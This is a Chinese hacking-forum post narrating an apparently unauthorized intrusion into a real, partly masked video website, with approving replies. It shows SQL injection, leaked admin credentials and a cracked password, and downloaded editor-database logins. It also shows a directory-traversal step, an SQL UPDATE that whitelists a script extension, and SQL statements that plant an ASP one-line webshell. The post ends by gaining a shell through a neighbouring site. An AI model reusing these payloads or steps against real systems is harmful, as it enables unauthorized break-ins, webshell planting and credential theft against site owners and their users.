查看: 34490|回复: 43

一次搞站经过

[复制链接]
  • TA的每日心情

    2016-11-3 18:40
  • 签到天数: 7 天

    [LV.3]偶尔看看II

    发表于 2013-1-31 14:21:07 | 显示全部楼层 |阅读模式
    本帖最后由 ilx 于 2013-2-11 14:53 编辑

    没啥技术含量。。

    目标 :http://www.xxxxx.tv/

    网站是asp脚本的iis搭建的吧



    02.png

    这有个文章 我们点进去  试了下注入 好像不行。提示参数错误

    http://www.xxxx.tv/news.asp?id=2774-1

    应该是对id那个参数 做了限制 是否为整数 所以应该这个无法注入了

    QQ截图20130130180454.png

    然后又看到了上面有个论坛 点进去 看了看

    http://www.xxxx.tv/bbs/index.asp

    03.png

    试了下默认密码 和常用的弱口令 表示不行

    http://www.XXXX.tv/guest/index.asp
    然后又看那个留言板 有个管理的地方
    同样的试了弱口令也不行

    04.png

    然后用扫描器把网站给扫描了一遍

    05.png

    有个Fckedifor编辑器目录 但是点进去就。。

    06.png

    editor这个目录也一样。。

    这也没扫出来多大的用处。。

    然后又在主页上看到了有个主持人的一个图片按钮。。

    07.png

    08.png (图片经过处理)

    发现他们主持人每人都有个独立的博客
    09.png




    有个管理登陆的地方还是习惯的试了弱口令 登陆不上。。

    10.png


    http://www.XXX.tv/bk/01/img/okimg.asp?id=6

    看了下有注入 我就扔掉注入工具里 跑了。。

    |hyz7881943|8d5e043e402c7d6b|密码解密后为 7881943

    然后顺利的登陆后台了。。

    11.png
    有个上传图片的。。

    传了个图片测试下。。

    12.png

    我们右键查看源码。。

    13.png

    靠。。有木有搞错。。(带值查询的然后得到图片地址? 以为路径存在数据库里了?原先以为)

    没有路径也是白搭。。。

    然后又试了几次上传 都不行。。然后我百度搜索了一下 showimg.asp 看他工作方式。。
    发现是2进制存数据库里了 需要的时候再读出来 所以他根本就木有文件路径
    。。。。  链接 :showimg.asp资料

    {:soso__6618209543613613949_2:}



    然后又看到了一个上传的。。。

    14.png
    15.png
    蛋疼出现同样的错误。。。
    靠靠 。。。无奈啊。。于是又扫描了bk/01/这个目录

    发现有个ewebedit编辑器 试了下弱口令不行 然后下载了数据库
    17.png
    账号是 china 密码是chinaboy
    好啊。。此时心中激动啊。。
    于是添加了个图片类型 aaspsp点确定。。
    18.png
    有木有搞错啊。。{:soso__6618209543613613949_2:}
    然后试了他主持人的所有编辑器 都是一样。。。靠靠 天亡我也啊。。
    然后突然想到这密码会不会和论坛密码一样。。然后。。。哈哈。。
    20.png
    21.png
    22.png
    保存就提示这。。靠。。
    23.png
    备份数据库 提示 备份失败,请确保服务器支持FSO,且 databackup 目录可写!
    还有个sql执行可以用。。问题是现在不知道路径怎么搞?于是想到了 那个编辑器的遍历漏洞。。
    http://www.XXXX.tv/bk/01/edit/ad ... r=../../../../../..
    24.png
    原先想的是用sql 语句更新编辑器  增加个文件类型。。
    wwwroot\XXX\bk\01\edit\db\ewebeditor1013.mdb
    没盘符。。就猜下了。。
    update eWebEditor_Style in 'D:\wwwroot\XXX\bk\01\edit\db\ewebeditor1013.mdb' set   s_imageext='gif|jpg|jpeg|bmp|aasasa' where s_id=40
    25.png
    靠。。。不能更新。。只读的?。。然后又用 这个语句

    create table cmd (a varchar(50))  // 创建一个名为cmd表
    insert into cmd (a) values ('<%execute(request("X"))%>')  //插入cmd表的a列 一句话木马
    select * into [a] in 'e:\web\webshellcc\1.asa;x.xls' 'excel 4.0;' from cmd  // 导出
    drop table cmd //删除cmd表

    26.png
    难道是 目录全部都是只读权限?所以那编辑器出现错误? 还有那上传的也是 ?
    然后配合编辑器的遍历漏洞 试了他的目录 发现可写的没有执行权限 或者你的ip被限制了那种。。。
    然后又想到了旁站
    27.png (旁站那是phpcms的)

    配合编辑器的遍历漏洞顺利找到路径 然后导出执行语句导出到那个网站 发现不支持asp脚本 然后换了个php的才算ok。。

    28.png

    评分

    参与人数 1i币 +4 收起 理由
    made + 4 感谢分享

    查看全部评分

    回复

    使用道具 举报

  • TA的每日心情

    2020-10-2 23:00
  • 签到天数: 10 天

    [LV.3]偶尔看看II

    发表于 2013-1-31 14:27:11 | 显示全部楼层
    感谢分享~~
       思路比较全面,从注入、编辑器、弱口令、上传shell   
    还是比较全面的,加上提权就更好了
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2019-9-21 13:55
  • 签到天数: 9 天

    [LV.3]偶尔看看II

    发表于 2013-1-31 17:57:41 | 显示全部楼层
    本帖最后由 冰刀 于 2013-1-31 18:02 编辑

    看了在说  update eWebEditor_Style in 'D:\wwwroot\XXX\bk\01\edit\db\ewebeditor1013.mdb' set   s_imageext='gif|jpg|jpeg|bmp|aasasa' where s_id=40  这个不错 收藏了....  
    回复 支持 反对

    使用道具 举报

    handsomeqin 该用户已被删除
    发表于 2013-1-31 18:00:36 | 显示全部楼层
    提示: 作者被禁止或删除 内容自动屏蔽
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2013-1-31 19:48:37 | 显示全部楼层
    看看学习下,
    回复 支持 反对

    使用道具 举报

  • TA的每日心情

    2016-7-19 16:41
  • 签到天数: 4 天

    [LV.2]偶尔看看I

    发表于 2013-1-31 20:29:39 | 显示全部楼层
    看看
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2013-1-31 20:56:39 来自手机 | 显示全部楼层
    不错嘛,有意思
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2013-1-31 21:14:38 | 显示全部楼层
    学习了,楼主厉害
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2013-1-31 22:03:08 | 显示全部楼层
    因为回复可见!
    回复 支持 反对

    使用道具 举报

    H.U.C_小帝 该用户已被删除
    发表于 2013-1-31 22:52:00 | 显示全部楼层
    提示: 作者被禁止或删除 内容自动屏蔽
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-12-26 01:29 , Processed in 0.039687 second(s), 18 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部